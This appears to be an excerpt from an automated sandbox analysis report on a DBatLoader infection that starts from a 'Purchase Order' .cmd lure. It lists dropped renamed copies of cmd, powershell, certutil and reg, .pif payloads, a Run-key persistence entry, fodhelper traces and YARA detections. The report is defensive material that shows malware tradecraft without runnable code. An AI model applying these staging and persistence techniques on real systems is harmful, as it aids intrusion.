                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: ??.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: urlmon.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: srvcli.dll
                    Source: C:\Users\Public\Libraries\sppsvc.pifSection loaded: rstrtmgr.dll
                    Source: C:\Users\Public\xkn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Google Drive.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: YouTube.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Sheets.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Gmail.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Slides.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Docs.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\Public\xkn.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\System32\fodhelper.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociationsJump to behavior
                    Source: Purchase Order is approved26042024.cmdStatic file information: File size 4050655 > 1048576
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
                    Source: Binary string: powershell.pdbUGP source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
                    Source: Binary string: certutil.pdb source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr
                    Source: Binary string: easinvoker.pdbH source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: reg.pdb source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
                    Source: Binary string: powershell.pdb source: xkn.exe, 00000009.00000000.2006908631.00007FF7039FA000.00000002.00000001.01000000.00000005.sdmp, xkn.exe.5.dr
                    Source: Binary string: cmd.pdb source: alpha.exe, 00000004.00000000.1998728374.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000004.00000002.2002359413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000000.2003137902.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000006.00000002.2005546829.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000000.2006374754.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000008.00000002.2190614123.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000002.2081511308.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000000D.00000000.2060873941.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000002.2196206720.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000016.00000000.2191189282.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000002.2205484657.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000018.00000000.2197588239.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000002.2215820004.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001A.00000000.2206066287.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000002.2222894108.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001D.00000000.2220925872.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000000.2223386290.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001E.00000002.2226562413.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000000.2227078252.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 0000001F.00000002.2228243296.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000000.2228676409.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000020.00000002.2231357471.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000000.2231834320.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe, 00000022.00000002.2236395171.00007FF789BF2000.00000002.00000001.01000000.00000004.sdmp, alpha.exe.2.dr
                    Source: Binary string: reg.pdbGCTL source: extrac32.exe, 00000007.00000002.2004984243.00000265FFB10000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 0000000E.00000002.2062763578.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 0000000E.00000000.2061379881.00007FF655890000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.7.dr
                    Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr

                    Data Obfuscation

                    barindex
                    Yara detected DBatLoader
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.29a0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 36.2.Kpeyvroh.PIF.29a0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000001C.00000002.4509142171.0000000002891000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2420298425.00000000024A6000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000026.00000002.2505959580.0000000002841000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: alpha.exe.2.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1B9F6A63 LoadLibraryA,GetProcAddress,28_2_1B9F6A63
                    Source: alpha.exe.2.drStatic PE information: section name: .didat
                    Source: kn.exe.23.drStatic PE information: section name: .didat
                    Source: C:\Users\Public\kn.exeCode function: 25_2_00007FF67DE63668 push rsp; ret 25_2_00007FF67DE63669
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028932C0 push eax; ret 28_2_028932FC
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028B82F4 push 028B835Fh; ret 28_2_028B8357
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_0289631E push 0289637Bh; ret 28_2_02896373
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_02896320 push 0289637Bh; ret 28_2_02896373
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028B80AC push 028B8125h; ret 28_2_028B811D
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028B81F8 push 028B8288h; ret 28_2_028B8280
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028B8144 push 028B81ECh; ret 28_2_028B81E4
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028966EA push 0289672Eh; ret 28_2_02896726
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028966EC push 0289672Eh; ret 28_2_02896726
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_0289C4A0 push ecx; mov dword ptr [esp], edx28_2_0289C4A5
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_0289D4D4 push 0289D500h; ret 28_2_0289D4F8
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028B7428 push 028B7600h; ret 28_2_028B75F8
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A9AD0 push 028A9B08h; ret 28_2_028A9B00
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028ACA48 push ecx; mov dword ptr [esp], edx28_2_028ACA4D
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_0289CB20 push 0289CCA6h; ret 28_2_0289CC9E
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A7840 push 028A78BDh; ret 28_2_028A78B5
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_0289C857 push 0289CCA6h; ret 28_2_0289CC9E
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A687A push 028A6927h; ret 28_2_028A691F
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A687C push 028A6927h; ret 28_2_028A691F
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A2E94 push 028A2F0Ah; ret 28_2_028A2F02
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A2F9F push 028A2FEDh; ret 28_2_028A2FE5
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A2FA0 push 028A2FEDh; ret 28_2_028A2FE5
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A7C1E push 028A7C58h; ret 28_2_028A7C50
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A7C20 push 028A7C58h; ret 28_2_028A7C50
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_028A5DB0 push ecx; mov dword ptr [esp], edx28_2_028A5DB2
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA3E326 push esp; retf 28_2_1BA3E327
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA47106 push ecx; ret 28_2_1BA47119
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA24E56 push ecx; ret 28_2_1BA24E69
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA44658 push dword ptr [esp+ecx-75h]; iretd 28_2_1BA4465C
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA3DD28 push esp; retf 28_2_1BA3DD30

                    Persistence and Installation Behavior

                    barindex
                    Drops PE files with a suspicious file extension
                    Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Kpeyvroh.PIFJump to dropped file
                    Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\sppsvc.pifJump to dropped file
                    Source: C:\Users\Public\Libraries\Kpeyvroh.PIFCode function: 36_2_21066EB0 ShellExecuteW,URLDownloadToFileW,36_2_21066EB0
                    Source: C:\Windows\SysWOW64\extrac32.exeFile created: C:\Users\Public\Libraries\Kpeyvroh.PIFJump to dropped file
                    Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\sppsvc.pifJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file

                    Boot Survival

                    barindex
                    Drops PE files to the user root directory
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\xkn.exeJump to dropped file
                    Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\ger.exeJump to dropped file
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA0AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW,28_2_1BA0AB0D
                    Source: C:\Users\Public\Libraries\sppsvc.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kpeyvroh
                    Source: C:\Users\Public\Libraries\sppsvc.pifRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Kpeyvroh
                    Source: C:\Users\Public\Libraries\sppsvc.pifCode function: 28_2_1BA25E5E GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,28_2_1BA25E5E
                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\Public\xkn.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
